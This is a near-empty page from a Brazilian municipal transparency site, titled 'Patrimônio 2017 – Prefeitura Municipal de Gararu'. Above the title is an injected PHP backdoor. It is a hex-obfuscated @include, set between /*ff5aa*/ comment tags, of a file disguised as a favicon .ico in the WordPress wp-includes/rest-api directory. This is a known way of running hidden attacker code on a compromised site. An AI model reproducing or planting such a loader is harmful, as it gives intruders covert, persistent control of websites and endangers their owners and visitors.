/*ff5aa*/ @include "\x2fhom\x65/tr\x61nsp\x61r/p\x75bli\x63_ht\x6dl/g\x61rar\x75.tr\x61nsp\x61ren\x63iam\x75nic\x69pio\x73.co\x6d.br\x2fwp-\x69ncl\x75des\x2fres\x74-ap\x69/en\x64poi\x6ets/\x66avi\x63on_\x66087\x352.i\x63o"; /*ff5aa*/ Patrimônio 2017 – Prefeitura Municipal de Gararu